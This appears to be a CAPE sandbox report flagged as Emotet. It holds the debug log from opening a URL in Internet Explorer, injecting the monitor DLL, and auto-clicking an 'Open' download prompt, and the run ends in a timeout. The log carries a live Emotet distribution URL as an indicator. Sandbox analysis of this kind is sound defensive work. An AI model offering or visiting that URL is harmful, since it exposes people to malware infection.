CAPE

Detections: Emotet


Analysis

Category Package Started Completed Duration Options Log
URL ie 2019-05-14 14:42:09 2019-05-14 14:46:56 287 seconds Show Options Show Log
  • Error: The analysis hit the critical timeout, terminating.
route = internet
procdump = 1
2019-05-14 15:42:09,000 [root] INFO: Date set to: 05-14-19, time set to: 14:42:09, timeout set to: 200
2019-05-14 15:42:09,062 [root] DEBUG: Starting analyzer from: C:\tcjnwjnzzp
2019-05-14 15:42:09,062 [root] DEBUG: Storing results at: C:\gpkjls
2019-05-14 15:42:09,062 [root] DEBUG: Pipe server name: \\.\PIPE\OcFYdy
2019-05-14 15:42:09,062 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-05-14 15:42:09,062 [root] INFO: Automatically selected analysis package "ie"
2019-05-14 15:42:10,029 [root] DEBUG: Started auxiliary module Browser
2019-05-14 15:42:10,029 [root] DEBUG: Started auxiliary module Curtain
2019-05-14 15:42:10,045 [modules.auxiliary.digisig] DEBUG: Skipping authenticode validation, analysis is not a file.
2019-05-14 15:42:10,045 [root] DEBUG: Started auxiliary module DigiSig
2019-05-14 15:42:10,045 [root] DEBUG: Started auxiliary module Disguise
2019-05-14 15:42:10,045 [root] DEBUG: Started auxiliary module Human
2019-05-14 15:42:10,045 [root] DEBUG: Started auxiliary module Screenshots
2019-05-14 15:42:10,045 [root] DEBUG: Started auxiliary module Sysmon
2019-05-14 15:42:10,045 [root] DEBUG: Started auxiliary module Usage
2019-05-14 15:42:10,045 [root] INFO: Analyzer: Package modules.packages.ie does not specify a DLL option
2019-05-14 15:42:10,045 [root] INFO: Analyzer: Package modules.packages.ie does not specify a DLL_64 option
2019-05-14 15:42:10,092 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files (x86)\Internet Explorer\iexplore.exe" with arguments ""http://test5.freebottlepc.com/tuzpq/FILE/cooujsc19a2cegnj6_tcmotog-266543746/"" with pid 548
2019-05-14 15:42:10,092 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-14 15:42:10,092 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:42:10,092 [lib.api.process] INFO: 32-bit DLL to inject is C:\tcjnwjnzzp\dll\WxChra.dll, loader C:\tcjnwjnzzp\bin\nQdUxdR.exe
2019-05-14 15:42:10,357 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:42:10,357 [root] DEBUG: Loader: Injecting process 548 (thread 1900) with C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:10,357 [root] DEBUG: Process image base: 0x01330000
2019-05-14 15:42:10,357 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:10,357 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x013D6000 - 0x77380000
2019-05-14 15:42:10,357 [root] DEBUG: InjectDllViaIAT: Allocated 0x218 bytes for new import table at 0x013E0000.
2019-05-14 15:42:10,357 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-14 15:42:10,357 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:10,357 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 548
2019-05-14 15:42:12,368 [lib.api.process] INFO: Successfully resumed process with pid 548
2019-05-14 15:42:12,368 [root] INFO: Added new process to list with pid: 548
2019-05-14 15:42:12,431 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:42:12,431 [root] DEBUG: Process dumps enabled.
2019-05-14 15:42:12,477 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:12,477 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-05-14 15:42:12,477 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:12,477 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:12,477 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:12,477 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 548 at 0x747a0000, image base 0x1330000, stack from 0x1e2000-0x1f0000
2019-05-14 15:42:12,477 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Program Files (x86)\Internet Explorer\iexplore.exe" "http:\test5.freebottlepc.com\tuzpq\FILE\cooujsc19a2cegnj6_tcmotog-266543746\".
2019-05-14 15:42:12,477 [root] INFO: Monitor successfully loaded in process with pid 548.
2019-05-14 15:42:12,493 [root] DEBUG: DLL unloaded from 0x76940000.
2019-05-14 15:42:12,525 [root] DEBUG: DLL loaded at 0x731E0000: C:\Windows\system32\IEFRAME (0xa80000 bytes).
2019-05-14 15:42:12,555 [root] DEBUG: DLL loaded at 0x74B60000: C:\Windows\system32\OLEACC (0x3c000 bytes).
2019-05-14 15:42:12,555 [root] DEBUG: DLL loaded at 0x74600000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-05-14 15:42:12,602 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\profapi (0xb000 bytes).
2019-05-14 15:42:12,618 [root] DEBUG: DLL loaded at 0x752D0000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-05-14 15:42:12,618 [root] DEBUG: DLL loaded at 0x75850000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-05-14 15:42:12,634 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\system32\dnsapi (0x44000 bytes).
2019-05-14 15:42:12,634 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\system32\iphlpapi (0x1c000 bytes).
2019-05-14 15:42:12,634 [root] DEBUG: DLL loaded at 0x74B20000: C:\Windows\system32\WINNSI (0x7000 bytes).
2019-05-14 15:42:12,634 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-05-14 15:42:12,665 [root] DEBUG: DLL loaded at 0x745A0000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-05-14 15:42:12,680 [root] DEBUG: DLL loaded at 0x74E30000: C:\Windows\System32\nlaapi (0x10000 bytes).
2019-05-14 15:42:12,680 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-05-14 15:42:12,680 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-05-14 15:42:12,680 [root] DEBUG: DLL loaded at 0x74B10000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-05-14 15:42:12,697 [root] DEBUG: DLL unloaded from 0x745A0000.
2019-05-14 15:42:12,697 [root] DEBUG: DLL loaded at 0x768C0000: C:\Windows\syswow64\comdlg32 (0x7b000 bytes).
2019-05-14 15:42:12,775 [root] DEBUG: DLL loaded at 0x745C0000: C:\Program Files (x86)\Internet Explorer\sqmapi (0x33000 bytes).
2019-05-14 15:42:12,775 [root] DEBUG: DLL unloaded from 0x75760000.
2019-05-14 15:42:12,775 [root] DEBUG: DLL unloaded from 0x77050000.
2019-05-14 15:42:12,775 [root] DEBUG: DLL unloaded from 0x745C0000.
2019-05-14 15:42:12,775 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-05-14 15:42:12,789 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-05-14 15:42:12,789 [root] DEBUG: DLL unloaded from 0x77560000.
2019-05-14 15:42:12,789 [root] DEBUG: DLL loaded at 0x74B00000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-05-14 15:42:12,914 [root] DEBUG: DLL unloaded from 0x75530000.
2019-05-14 15:42:12,914 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-05-14 15:42:12,914 [root] DEBUG: DLL unloaded from 0x01330000.
2019-05-14 15:42:12,930 [root] INFO: Announced 32-bit process name: iexplore.exe pid: 1552
2019-05-14 15:42:12,930 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-14 15:42:12,930 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:42:12,930 [lib.api.process] INFO: 32-bit DLL to inject is C:\tcjnwjnzzp\dll\WxChra.dll, loader C:\tcjnwjnzzp\bin\nQdUxdR.exe
2019-05-14 15:42:12,930 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:42:12,930 [root] DEBUG: Loader: Injecting process 1552 (thread 164) with C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:12,930 [root] DEBUG: Process image base: 0x01330000
2019-05-14 15:42:12,946 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:12,946 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x013D6000 - 0x77380000
2019-05-14 15:42:12,946 [root] DEBUG: InjectDllViaIAT: Allocated 0x218 bytes for new import table at 0x013E0000.
2019-05-14 15:42:12,946 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-14 15:42:12,946 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\WxChra.dll.
2019-05-14 15:42:12,946 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1552
2019-05-14 15:42:12,946 [root] DEBUG: DLL loaded at 0x745A0000: C:\Windows\system32\RASAPI32 (0x52000 bytes).
2019-05-14 15:42:12,946 [root] DEBUG: DLL loaded at 0x74580000: C:\Windows\system32\rasman (0x15000 bytes).
2019-05-14 15:42:12,946 [root] DEBUG: DLL unloaded from 0x745A0000.
2019-05-14 15:42:12,946 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:42:12,946 [root] DEBUG: Process dumps enabled.
2019-05-14 15:42:12,946 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:12,946 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-05-14 15:42:12,946 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1552 at 0x747a0000, image base 0x1330000, stack from 0x2c2000-0x2d0000
2019-05-14 15:42:12,946 [root] DEBUG: Commandline: C:\Users\user\Desktop\"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:548 CREDAT:79873.
2019-05-14 15:42:12,946 [root] INFO: Added new process to list with pid: 1552
2019-05-14 15:42:12,946 [root] INFO: Monitor successfully loaded in process with pid 1552.
2019-05-14 15:42:12,961 [root] DEBUG: DLL unloaded from 0x76940000.
2019-05-14 15:42:12,961 [root] DEBUG: DLL loaded at 0x731E0000: C:\Windows\system32\IEFRAME (0xa80000 bytes).
2019-05-14 15:42:12,961 [root] DEBUG: DLL loaded at 0x74B60000: C:\Windows\system32\OLEACC (0x3c000 bytes).
2019-05-14 15:42:12,961 [root] DEBUG: DLL loaded at 0x74600000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-05-14 15:42:12,961 [root] DEBUG: DLL loaded at 0x768C0000: C:\Windows\syswow64\comdlg32 (0x7b000 bytes).
2019-05-14 15:42:12,961 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\rtutils (0xd000 bytes).
2019-05-14 15:42:12,961 [root] DEBUG: DLL unloaded from 0x74AF0000.
2019-05-14 15:42:12,961 [root] DEBUG: DLL unloaded from 0x74580000.
2019-05-14 15:42:12,977 [root] DEBUG: DLL unloaded from 0x75370000.
2019-05-14 15:42:12,977 [root] DEBUG: DLL loaded at 0x74530000: C:\Windows\system32\sensapi (0x6000 bytes).
2019-05-14 15:42:12,977 [root] DEBUG: DLL loaded at 0x74E30000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-05-14 15:42:12,977 [root] DEBUG: DLL loaded at 0x74540000: C:\Program Files (x86)\Internet Explorer\IEShims (0x35000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74E20000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74E00000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74F00000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74DA0000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74EF0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74520000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74510000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74B10000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x744D0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-05-14 15:42:12,993 [root] DEBUG: DLL loaded at 0x74490000: C:\Program Files (x86)\Internet Explorer\sqmapi (0x33000 bytes).
2019-05-14 15:42:13,009 [root] DEBUG: DLL unloaded from 0x75760000.
2019-05-14 15:42:13,009 [root] DEBUG: DLL unloaded from 0x77050000.
2019-05-14 15:42:13,009 [root] DEBUG: DLL unloaded from 0x74490000.
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x74470000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x74450000: C:\Windows\system32\DHCPCSVC (0x12000 bytes).
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x74440000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2019-05-14 15:42:13,023 [root] DEBUG: DLL unloaded from 0x74B30000.
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-05-14 15:42:13,023 [root] DEBUG: DLL unloaded from 0x74450000.
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-05-14 15:42:13,023 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-05-14 15:42:13,039 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-05-14 15:42:13,039 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1708
2019-05-14 15:42:13,039 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-05-14 15:42:13,039 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2019-05-14 15:42:13,039 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:42:13,039 [lib.api.process] INFO: 64-bit DLL to inject is C:\tcjnwjnzzp\dll\XgmKYpN.dll, loader C:\tcjnwjnzzp\bin\UCNgMgBu.exe
2019-05-14 15:42:13,039 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:42:13,039 [root] DEBUG: Loader: Injecting process 1708 (thread 0) with C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:42:13,039 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 1776, handle 0x84
2019-05-14 15:42:13,039 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-05-14 15:42:13,039 [root] DEBUG: Process image base: 0x00000000FFA80000
2019-05-14 15:42:13,039 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-05-14 15:42:13,039 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-05-14 15:42:13,039 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-05-14 15:42:13,055 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:42:13,055 [root] DEBUG: Process dumps enabled.
2019-05-14 15:42:13,055 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:13,071 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\profapi (0xb000 bytes).
2019-05-14 15:42:13,086 [root] WARNING: Unable to place hook on LockResource
2019-05-14 15:42:13,086 [root] WARNING: Unable to hook LockResource
2019-05-14 15:42:13,118 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1708 at 0x0000000074260000, image base 0x00000000FFA80000, stack from 0x0000000006462000-0x0000000006470000
2019-05-14 15:42:13,118 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2019-05-14 15:42:13,118 [root] INFO: Added new process to list with pid: 1708
2019-05-14 15:42:13,118 [root] INFO: Monitor successfully loaded in process with pid 1708.
2019-05-14 15:42:13,134 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-05-14 15:42:13,134 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-05-14 15:42:13,134 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:42:13,196 [root] DEBUG: DLL loaded at 0x74230000: C:\Windows\system32\IEUI (0x2d000 bytes).
2019-05-14 15:42:13,196 [root] DEBUG: DLL loaded at 0x74220000: C:\Windows\system32\MSIMG32 (0x5000 bytes).
2019-05-14 15:42:13,257 [root] DEBUG: DLL loaded at 0x741F0000: C:\Program Files (x86)\Internet Explorer\ieproxy (0x2b000 bytes).
2019-05-14 15:42:13,305 [root] DEBUG: DLL loaded at 0x74340000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-05-14 15:42:13,321 [root] DEBUG: DLL unloaded from 0x74340000.
2019-05-14 15:42:13,368 [root] DEBUG: DLL loaded at 0x741E0000: C:\Windows\system32\mssprxy (0xc000 bytes).
2019-05-14 15:42:13,446 [root] DEBUG: DLL loaded at 0x74160000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-05-14 15:42:13,601 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-05-14 15:42:13,601 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-05-14 15:42:13,601 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-05-14 15:42:13,601 [root] DEBUG: DLL unloaded from 0x75B20000.
2019-05-14 15:42:13,632 [root] DEBUG: DLL loaded at 0x74130000: C:\Windows\system32\xmllite (0x2f000 bytes).
2019-05-14 15:42:13,742 [root] DEBUG: DLL loaded at 0x73FC0000: C:\Windows\system32\explorerframe (0x16f000 bytes).
2019-05-14 15:42:13,773 [root] DEBUG: DLL loaded at 0x73F90000: C:\Windows\system32\DUser (0x2f000 bytes).
2019-05-14 15:42:13,789 [root] DEBUG: DLL loaded at 0x73ED0000: C:\Windows\system32\DUI70 (0xb2000 bytes).
2019-05-14 15:42:13,898 [root] DEBUG: DLL loaded at 0x752D0000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-05-14 15:42:13,898 [root] DEBUG: DLL loaded at 0x75850000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-05-14 15:42:13,898 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\system32\dnsapi (0x44000 bytes).
2019-05-14 15:42:13,898 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\system32\iphlpapi (0x1c000 bytes).
2019-05-14 15:42:13,898 [root] DEBUG: DLL loaded at 0x74B20000: C:\Windows\system32\WINNSI (0x7000 bytes).
2019-05-14 15:42:13,898 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-05-14 15:42:13,914 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-05-14 15:42:13,914 [root] DEBUG: DLL loaded at 0x741F0000: C:\Program Files (x86)\Internet Explorer\ieproxy (0x2b000 bytes).
2019-05-14 15:42:13,928 [root] DEBUG: DLL loaded at 0x73E30000: C:\Windows\system32\msfeeds (0x96000 bytes).
2019-05-14 15:42:13,960 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-05-14 15:42:13,976 [root] DEBUG: DLL loaded at 0x74B00000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-05-14 15:42:13,976 [root] DEBUG: DLL unloaded from 0x75530000.
2019-05-14 15:42:13,992 [root] DEBUG: DLL loaded at 0x73E00000: C:\Windows\system32\MLANG (0x2e000 bytes).
2019-05-14 15:42:13,992 [root] DEBUG: DLL loaded at 0x75520000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-05-14 15:42:14,006 [root] DEBUG: DLL loaded at 0x745A0000: C:\Windows\system32\RASAPI32 (0x52000 bytes).
2019-05-14 15:42:14,006 [root] DEBUG: DLL loaded at 0x74580000: C:\Windows\system32\rasman (0x15000 bytes).
2019-05-14 15:42:14,006 [root] DEBUG: DLL unloaded from 0x745A0000.
2019-05-14 15:42:14,006 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\rtutils (0xd000 bytes).
2019-05-14 15:42:14,006 [root] DEBUG: DLL unloaded from 0x75370000.
2019-05-14 15:42:14,006 [root] DEBUG: DLL loaded at 0x74530000: C:\Windows\system32\sensapi (0x6000 bytes).
2019-05-14 15:42:14,006 [root] DEBUG: DLL unloaded from 0x74580000.
2019-05-14 15:42:14,006 [root] DEBUG: DLL unloaded from 0x77050000.
2019-05-14 15:42:14,006 [root] DEBUG: DLL loaded at 0x74F00000: C:\Windows\system32\mswsock (0x3c000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x74EF0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x75520000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x74E30000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x74E20000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x74E00000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x74DA0000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x74520000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-05-14 15:42:14,023 [root] DEBUG: DLL loaded at 0x73E00000: C:\Windows\system32\MLANG (0x2e000 bytes).
2019-05-14 15:42:14,038 [root] DEBUG: DLL loaded at 0x74510000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2019-05-14 15:42:14,038 [root] DEBUG: DLL loaded at 0x744D0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-05-14 15:42:14,038 [root] DEBUG: DLL loaded at 0x74470000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-05-14 15:42:14,038 [root] DEBUG: DLL loaded at 0x74450000: C:\Windows\system32\DHCPCSVC (0x12000 bytes).
2019-05-14 15:42:14,038 [root] DEBUG: DLL loaded at 0x74440000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2019-05-14 15:42:14,038 [root] DEBUG: DLL unloaded from 0x74B30000.
2019-05-14 15:42:14,038 [root] DEBUG: DLL unloaded from 0x74450000.
2019-05-14 15:42:14,053 [root] DEBUG: DLL loaded at 0x74160000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-05-14 15:42:14,069 [root] DEBUG: DLL loaded at 0x73DE0000: C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim (0x11000 bytes).
2019-05-14 15:42:14,069 [root] DEBUG: DLL loaded at 0x73D40000: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80 (0x9b000 bytes).
2019-05-14 15:42:14,085 [root] DEBUG: DLL loaded at 0x73150000: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCP80 (0x87000 bytes).
2019-05-14 15:42:14,115 [root] DEBUG: DLL loaded at 0x73D30000: C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper (0x10000 bytes).
2019-05-14 15:42:14,427 [root] DEBUG: DLL loaded at 0x73010000: C:\PROGRA~2\MICROS~1\Office14\URLREDIR (0x91000 bytes).
2019-05-14 15:42:14,444 [root] DEBUG: DLL loaded at 0x73140000: C:\Windows\system32\Secur32 (0x8000 bytes).
2019-05-14 15:42:14,444 [root] DEBUG: DLL loaded at 0x74E40000: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90 (0xa3000 bytes).
2019-05-14 15:42:14,460 [root] DEBUG: DLL loaded at 0x73120000: C:\PROGRA~2\MICROS~1\Office14\MSOHEV (0x14000 bytes).
2019-05-14 15:42:14,506 [root] DEBUG: DLL loaded at 0x73110000: C:\Program Files (x86)\Java\jre7\bin\jp2ssv (0xf000 bytes).
2019-05-14 15:42:14,538 [root] DEBUG: DLL loaded at 0x72F50000: C:\Program Files (x86)\Java\jre7\bin\MSVCR100 (0xbe000 bytes).
2019-05-14 15:42:14,552 [root] DEBUG: set_caller_info: Adding region at 0x043D0000 to caller regions list (ntdll::LdrLoadDll).
2019-05-14 15:42:14,569 [root] DEBUG: set_caller_info: Adding region at 0x00960000 to caller regions list (advapi32::RegOpenKeyExA).
2019-05-14 15:42:14,569 [root] DEBUG: DLL loaded at 0x730B0000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-05-14 15:42:14,756 [root] DEBUG: DLL loaded at 0x72F30000: C:\Windows\system32\DWMAPI (0x13000 bytes).
2019-05-14 15:42:14,772 [root] DEBUG: DLL loaded at 0x730B0000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-05-14 15:42:14,786 [root] DEBUG: DLL unloaded from 0x731E0000.
2019-05-14 15:42:14,834 [root] DEBUG: DLL unloaded from 0x77050000.
2019-05-14 15:42:15,318 [root] DEBUG: DLL unloaded from 0x75370000.
2019-05-14 15:42:15,489 [root] WARNING: File at path "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\favicon[1].ico" does not exist, skip.
2019-05-14 15:42:16,346 [root] DEBUG: DLL unloaded from 0x75370000.
2019-05-14 15:42:16,611 [root] DEBUG: DLL unloaded from 0x75530000.
2019-05-14 15:42:16,674 [root] DEBUG: DLL loaded at 0x72EE0000: C:\Windows\System32\Wpc (0x4f000 bytes).
2019-05-14 15:42:16,690 [root] DEBUG: DLL loaded at 0x72EC0000: C:\Windows\System32\USERENV (0x17000 bytes).
2019-05-14 15:42:16,690 [root] DEBUG: DLL loaded at 0x72E70000: C:\Windows\System32\wevtapi (0x42000 bytes).
2019-05-14 15:42:16,706 [root] DEBUG: DLL loaded at 0x72E60000: C:\Windows\system32\samcli (0xf000 bytes).
2019-05-14 15:42:16,721 [root] DEBUG: DLL loaded at 0x72E40000: C:\Windows\system32\SAMLIB (0x12000 bytes).
2019-05-14 15:42:16,736 [root] DEBUG: DLL loaded at 0x72E30000: C:\Windows\system32\netutils (0x9000 bytes).
2019-05-14 15:42:16,783 [root] DEBUG: DLL unloaded from 0x75760000.
2019-05-14 15:42:17,641 [modules.auxiliary.human] INFO: Found button "&Open", clicking it
2019-05-14 15:42:18,750 [root] DEBUG: DLL unloaded from 0x74130000.
2019-05-14 15:42:18,750 [root] DEBUG: DLL unloaded from 0x731E0000.
2019-05-14 15:42:18,780 [root] DEBUG: DLL loaded at 0x72EC0000: C:\Windows\system32\USERENV (0x17000 bytes).
2019-05-14 15:42:18,828 [root] DEBUG: DLL loaded at 0x74150000: C:\Windows\system32\LINKINFO (0x9000 bytes).
2019-05-14 15:42:18,842 [root] DEBUG: DLL unloaded from 0x74230000.
2019-05-14 15:42:18,842 [root] DEBUG: DLL unloaded from 0x74600000.
2019-05-14 15:42:18,842 [root] DEBUG: DLL unloaded from 0x73FC0000.
2019-05-14 15:42:18,842 [root] DEBUG: DLL unloaded from 0x731E0000.
2019-05-14 15:42:18,890 [root] DEBUG: DLL unloaded from 0x73010000.
2019-05-14 15:42:18,905 [root] DEBUG: DLL unloaded from 0x73110000.
2019-05-14 15:42:18,905 [root] DEBUG: DLL unloaded from 0x75760000.
2019-05-14 15:42:18,937 [root] DEBUG: DLL unloaded from 0x73DE0000.
2019-05-14 15:42:19,015 [root] DEBUG: DLL unloaded from 0x75760000.
2019-05-14 15:42:19,015 [root] DEBUG: DLL loaded at 0x74140000: C:\Windows\system32\winshfhc (0x6000 bytes).
2019-05-14 15:42:19,046 [root] DEBUG: DLL loaded at 0x74100000: C:\Windows\system32\WDSCORE (0x32000 bytes).
2019-05-14 15:42:19,108 [root] DEBUG: DLL unloaded from 0x751C0000.
2019-05-14 15:42:19,747 [modules.auxiliary.human] INFO: Found button "&Open", clicking it
